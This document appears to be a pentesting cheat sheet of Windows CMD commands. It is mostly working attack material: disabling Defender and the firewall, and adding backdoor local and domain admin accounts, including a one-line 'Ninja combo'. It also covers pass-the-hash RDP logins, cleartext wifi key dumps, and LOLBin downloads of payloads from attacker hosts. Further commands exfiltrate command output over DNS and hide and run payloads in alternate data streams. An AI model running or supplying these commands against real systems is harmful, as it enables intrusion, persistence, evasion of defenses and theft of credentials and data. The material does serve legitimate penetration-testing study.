# Basic CMD for Pentesters ## System info ### Version and Patches info ```bash wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches hostname DRIVERQUERY #3rd party driver vulnerable? ``` ### Environment ```bash set #List all environment variables ``` Some env variables to highlight: * **COMPUTERNAME**: Name of the computer * **TEMP/TMP:** Temp folder * **USERNAME:** Your username * **HOMEPATH/USERPROFILE:** Home directory * **windir:** C:\Windows * **OS**:Windos OS * **LOGONSERVER**: Name of domain controller * **USERDNSDOMAIN**: Domain name to use with DNS * **USERDOMAIN**: Name of the domain ```bash nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC ``` ### Mounted disks ```bash (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) wmic logicaldisk get caption,description,providername ``` ### AV ```bash WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List sc query windefend #Delete all rules of Defender (useful for machines without internet access) "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` ### Recycle Bin ```bash dir C:\$Recycle.Bin /s /b ``` ### Processes, Services & Software ```bash schtasks /query /fo LIST /v #Verbose out of scheduled tasks schtasks /query /fo LIST 2>nul | findstr TaskName schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM tasklist /V #List processes tasklist /SVC #links processes to started services net start #Windows Services started wmic service list brief #List services sc query #List of services dir /a "C:\Program Files" #Installed software dir /a "C:\Program Files (x86)" #Installed software reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software ``` ## Domain info ```bash echo %USERDOMAIN% #Get domain name echo %USERDNSDOMAIN% #Get domain name echo %logonserver% #Get name of the domain controller set logonserver #Get name of the domain controller set log #Get name of the domain controller net groups /domain #List of domain groups net group "domain computers" /domain #List of PCs connected to the domain net view /domain #Lis of PCs of the domain nltest /dclist: #List domain controllers net group "Domain Controllers" /domain #List PC accounts of domains controllers net group "Domain Admins" /domain #List users with domain admin privileges net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here) net user /domain #List all users of the domain net user /domain #Get information about that user net accounts /domain #Password and lockout policy nltest /domain_trust #Mapping of the trust relationships. ``` ### Logs & Events ```bash #Make a security query using another credentials wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321 ``` ## Users & Groups ### Users ```bash whoami /all #All info about me, take a look at the enabled tokens whoami /priv #Show only privileges net users #All users dir /b /ad "C:\Users" net user %username% #Info about a user (me) net accounts #Information about password requirements qwinsta #Anyone else logged in? cmdkey /list #List credential net user /add [username] [password] #Create user #Lauch new cmd.exe with new creds (to impersonate in network) runas /netonly /user\ "cmd.exe" ::The password will be prompted #Check current logon session as administrator using logonsessions from sysinternals logonsessions.exe logonsessions64.exe ``` ### Groups ```bash #Local net localgroup #All available groups net localgroup Administrators #Info about a group (admins) net localgroup administrators [username] /add #Add user to administrators #Domain net group /domain #Info about domain groups net group /domain #Users that belongs to the group ``` ### List sessions ```text qwinsta klist sessions ``` ### Password Policy ```text net accounts ``` ### Persistence with users ```bash # Add domain user and put them in Domain Admins group net user username password /ADD /DOMAIN net group "Domain Admins" username /ADD /DOMAIN # Add local user and put them local Administrators group net user username password /ADD net localgroup Administrators username /ADD # Add user to insteresting groups: net localgroup "Remote Desktop Users" UserLoginName /add net localgroup "Debugger users" UserLoginName /add net localgroup "Power users" UserLoginName /add ``` ## Network ### Interfaces, Routes, Ports, Hosts and DNSCache ```bash ipconfig /all #Info about interfaces route print #Print available routes arp -a #Know hosts netstat -ano #Opened ports? type C:\WINDOWS\System32\drivers\etc\hosts ipconfig /displaydns | findstr "Record" | findstr "Name Host" ``` ### Firewall ```bash netsh firewall show state # FW info, open ports netsh advfirewall firewall show rule name=all netsh firewall show config # FW info Netsh Advfirewall show allprofiles NetSh Advfirewall set allprofiles state off #Turn Off NetSh Advfirewall set allprofiles state on #Trun On netsh firewall set opmode disable #Turn Off ::How to open ports netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139 netsh firewall add portopening TCP 3389 "Remote Desktop" ::Enable Remote Desktop reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall add portopening TCP 3389 "Remote Desktop" ::netsh firewall set service remotedesktop enable #I found that this line is not needed ::sc config TermService start= auto #I found that this line is not needed ::net start Termservice #I found that this line is not needed ::Enable Remote assistance: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall set service remoteadmin enable ::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow) net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable ::Connect to RDP (using hash or password) xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49 ``` ### Shares ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains net view \\computer /ALL #List shares of a computer net use x: \\computer\share #Mount the share locally net share #Check current shares ``` ### Wifi ```bash netsh wlan show profile #AP SSID netsh wlan show profile key=clear #Get Cleartext Pass ``` ### SNMP ```text reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s ``` ### Network Interfaces ```bash ipconfig /all ``` ### ARP table ```bash arp -A ``` ## Download Bitsadmin.exe ```text bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 ``` CertReq.exe ```text CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt ``` Certutil.exe ```text certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe ``` Desktopimgdownldr.exe ```text set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr ``` Diantz.exe ```text diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab ``` Esentutl.exe ```text esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o ``` Expand.exe ```text expand \\webdav\folder\file.bat c:\ADS\file.bat ``` Extrac32.exe ```text extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt ``` Findstr.exe ```text findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe ``` Ftp.exe ```text cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" ``` GfxDownloadWrapper.exe ```text C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" ``` Hh.exe ```text HH.exe http://some.url/script.ps1 ``` Ieexec.exe ```text ieexec.exe http://x.x.x.x:8080/bypass.exe ``` Makecab.exe ```text makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab ``` MpCmdRun.exe ```text MpCmdRun.exe -DownloadFile -url -path //Windows Defender executable ``` Replace.exe ```text replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A ``` Excel.exe ```text Excel.exe http://192.168.1.10/TeamsAddinLoader.dll ``` Powerpnt.exe ```text Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" ``` Squirrel.exe ```text squirrel.exe --download [url to package] ``` Update.exe ```text Update.exe --download [url to package] ``` Winword.exe ```text winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" ``` Wsl.exe ```text wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' ``` ## Misc ```bash cd #Get current dir cd C:\path\to\dir #Change dir dir #List current dir dir /a:h C:\path\to\dir #List hidden files dir /s /b #Recursive list without shit time #Get current time date #Get current date shutdown /r /t 0 #Shutdown now type #Cat file #Runas runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials runas /netonly /user:\ "cmd.exe" ::The password will be prompted #Hide attrib +h file #Set Hidden attrib -h file #Quit Hidden #Give full control over a file that you owns icacls /t /e /p :F icacls /e /r #Remove the permision #Recursive copy to smb xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win #exe2bat to transform exe file in bat file #ADS dir /r #Detect ADS more file.txt:ads.txt #read ADS powershell (Get-Content file.txt -Stream ads.txt) ``` ### Listen address ACLs You can listen on [http://+:80/Temporary\_Listen\_Addresses/](http://+:80/Temporary_Listen_Addresses/) without being administrator. ```bash netsh http show urlacl ``` ### Manual DNS shell **Attacker** \(Kali\) must use one of these 2 options: ```bash sudo responder -I #Active sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive ``` #### Victim _**for /f tokens**_ \_\*\*\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server ```text for /f %a in ('whoami') do nslookup %a #Get whoami for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a #Get word2 for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c #List folder for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c #List that folder for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c #Same as last one #More complex commands for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i #Same as last one ``` You can also **redirect** the output, and then **read** it. ```text whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i ``` ## Calling CMD from C code ```c #include /* system, NULL, EXIT_FAILURE */ // When executed by Administrator this program will create a user and then add him to the administrators group // i686-w64-mingw32-gcc addmin.c -o addmin.exe // upx -9 addmin.exe int main (){ int i; i=system("net users otherAcc 0TherAcc! /add"); i=system("net localgroup administrators otherAcc /add"); return 0; } ``` ## Alternate Data Streams CheatSheet \(ADS/Alternate Data Stream\) Taken from [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) ```bash ###Add content to ADS### type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat set-content - path {path to the file} - stream {name of the stream} ### Discover ADS contecnt dir /R streams.exe #Binary from sysinternals# Get-Item -Path .\fie.txt -Stream * gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data' ###Extract content from ADS### expand c:\ads\file.txt:test.exe c:\temp\evil.exe esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o more < c:\ads\file.txt:test.exe ###Executing the ADS content### * WMIC wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' * Rundll32 rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll * Cscript cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs" * Wscript wscript c:\ads\file.txt:script.vbs echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js * Forfiles forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe" * Mavinject.exe c:\windows\SysWOW64\notepad.exe tasklist | findstr notepad notepad.exe 4172 31C5CE94259D4006 2 18,476 K type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" * MSHTA mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" (Does not work on Windows 10 1903 and newer) * Control.exe control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll https://twitter.com/bohops/status/954466315913310209 * Create service and run sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto sc start evilservice https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * Powershell.exe powershell -ep bypass - < c:\temp:ttt * Powershell.exe powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}" * Powershell.exe Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe} * Regedit.exe regedit c:\ads\file.txt:regfile.reg * Bitsadmin.exe bitsadmin /create myfile bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL bitsadmin /RESUME myfile * AppVLP.exe AppVLP.exe c:\windows\tracing\test.txt:ha.exe * Cmd.exe cmd.exe - < fakefile.doc:reg32.bat https://twitter.com/yeyint_mth/status/1143824979139579904 * Ftp.exe ftp -s:fakefile.txt:aaaa.txt https://github.com/sailay1996/misc-bin/blob/master/ads.md * ieframe.dll , shdocvw.dll (ads) echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt https://github.com/sailay1996/misc-bin/blob/master/ads.md * bash.exe echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh bash.exe -c $(fakefile.txt:payload.sh) https://github.com/sailay1996/misc-bin/blob/master/ads.md * Regsvr32 type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS ```